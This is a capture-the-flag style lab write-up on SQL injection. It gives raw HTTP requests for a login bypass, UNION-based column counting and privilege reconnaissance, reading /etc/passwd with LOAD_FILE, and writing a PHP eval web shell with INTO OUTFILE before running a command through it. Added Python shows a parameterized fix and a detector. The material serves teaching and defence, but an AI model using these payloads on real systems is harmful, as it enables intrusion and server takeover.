SQL Injection Basics

Introduction

To complete the SQL injection lab, you need to be familiar with:

  • 1. Authentication bypass
  • 2. UNION-based injection
  • 3. Writing files

Lab

Opening the lab shows a login form. Following the logic of a login form, the SQL statement behind it should be:

SELECT * FROM users WHERE username='$username' AND password='$password'
At this point you only need to inject into the username parameter to bypass authentication. The bypass payload is simple: as long as the query returns a row from the database, the login succeeds.

SELECT * FROM users WHERE username='000' or 1='1' #' AND password='2'

The principle is that the password condition is commented out. If you do not want to rely on a comment, you can also write 000' or 1 or 1='1

SELECT * FROM users WHERE username='000' or 1 or 1='1' AND password = '2'
In short, anything that gets past the system login works.

POST / HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 36
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

username=admin' or 1='1'#&password=1
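The difference between the interpolated login query above and a parameterized one, as an added example that is not part of the original write-up: it uses an in-memory SQLite table standing in for the lab's users table and the comment-free payload from the post (SQLite does not treat # as a comment, so the # variant is not used here).

```python
import sqlite3

# Constructed in-memory stand-in for the lab's users table (not the lab's data).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    conn.commit()
    return conn

def login_vulnerable(conn, username, password):
    """Builds the query by string interpolation, like the login form on the page."""
    sql = (f"SELECT * FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    """Same query with bound parameters: the input is data, never parsed as SQL."""
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

# The comment-free bypass payload quoted in the write-up.
BYPASS = "000' or 1 or 1='1"

def demo():
    """Run a valid login and the bypass payload through both query builders."""
    conn = make_db()
    return {
        "valid_vuln": login_vulnerable(conn, "admin", "correct-horse"),
        "valid_safe": login_safe(conn, "admin", "correct-horse"),
        "bypass_vuln": login_vulnerable(conn, BYPASS, "2"),   # True: 'or 1' wins
        "bypass_safe": login_safe(conn, BYPASS, "2"),         # False: literal lookup
    }
```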

Once inside the back end, the system's search function is also vulnerable to SQL injection.
To perform a UNION query you need to know the number of columns in the original SELECT; use ORDER BY with a binary search over the column count.

30 columns

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 30--+

15 columns

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 27
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 15--+

7 columns

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 7--+

4 columns

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 4--+

5 columns

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 5--+

6 columns

POST /dashboard/dashboard.php HTTP/1.1
Host: 94.237.62.195:44022
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.62.195:44022
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.62.195:44022/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=8bll7vh6ark3bqefk8hrv5uupu
Connection: close

search=Adam' order by 6--+

Testing shows the query has 5 columns.

Query the current database user: root@localhost

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 48
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam' union select "","","","",user() --+

Query whether the current user has elevated privileges; a response of Y means it does.

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 68
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam' union select "","","","",super_priv from mysql.user --+

Next, query the value of secure_file_priv.

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 148
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam' UNION SELECT 1, variable_name, variable_value, 4, 5 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

  • If it is NULL, file reads and writes are not allowed.
  • If it is set to a directory, only that directory can be accessed.
  • If it is empty, the whole filesystem can be accessed.

Use the LOAD_FILE function to read a file.

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 65
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam'UNION SELECT "","","","",LOAD_file("/etc/passwd") --+

Next, write a shell. Files cannot be written to /var/www/html/, but /var/www/html/dashboard turned out to be writable.

POST /dashboard/dashboard.php HTTP/1.1
Host: 83.136.255.150:42661
Content-Length: 112
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://83.136.255.150:42661
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://83.136.255.150:42661/dashboard/dashboard.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close

search=Adam'UNION SELECT "","","","","<?php eval($_POST[1]);?>" INTO OUTFILE '/var/www/html/dashboard/2.php' --+

POST /dashboard/2.php HTTP/1.1
Host: 83.136.255.150:42661
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4njhoqceu87bo94m46a6crr89j
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

1=system("whoami");
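As an added example that is not part of the original write-up, here is a small Python detector that checks form bodies for each stage of the chain shown above (column probing, UNION, privilege recon, LOAD_FILE, INTO OUTFILE). The rule names and the sample bodies are my own constructions shaped like the requests in this post; two benign searches are included to check for false positives.

```python
import re
from urllib.parse import unquote_plus

# Constructed request bodies in the shape of the ones above; the last two are benign.
SAMPLE_BODIES = [
    "search=Adam' order by 30--+",
    "search=Adam' union select \"\",\"\",\"\",\"\",user() --+",
    "search=Adam' union select \"\",\"\",\"\",\"\",super_priv from mysql.user --+",
    "search=Adam' UNION SELECT 1, variable_name, variable_value, 4, 5 FROM "
    "information_schema.global_variables where variable_name=\"secure_file_priv\"-- -",
    "search=Adam'UNION SELECT \"\",\"\",\"\",\"\",LOAD_file(\"/etc/passwd\") --+",
    "search=Adam'UNION SELECT \"\",\"\",\"\",\"\",\"x\" INTO OUTFILE '/var/www/html/dashboard/2.php' --+",
    "search=Adam",
    "search=O'Brien",
]

# Each rule is named after the attack stage it corresponds to in the write-up.
RULES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union injection",    re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("privilege recon",    re.compile(r"\b(super_priv|mysql\.user|information_schema)\b", re.I)),
    ("file read",          re.compile(r"\bload_file\s*\(", re.I)),
    ("file write",         re.compile(r"\binto\s+(out|dump)file\b", re.I)),
]

def classify(body):
    """Return the attack stages matched by one URL-encoded form body."""
    decoded = unquote_plus(body)   # '+' becomes a space, %xx sequences are decoded
    return [name for name, rx in RULES if rx.search(decoded)]

def scan(bodies):
    """Map each body to its matched stages; benign bodies map to an empty list."""
    return {b: classify(b) for b in bodies}
```

The decode step matters because `--+` only becomes the `-- ` comment after URL decoding, and a rule that inspects the raw body would miss encoded variants.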
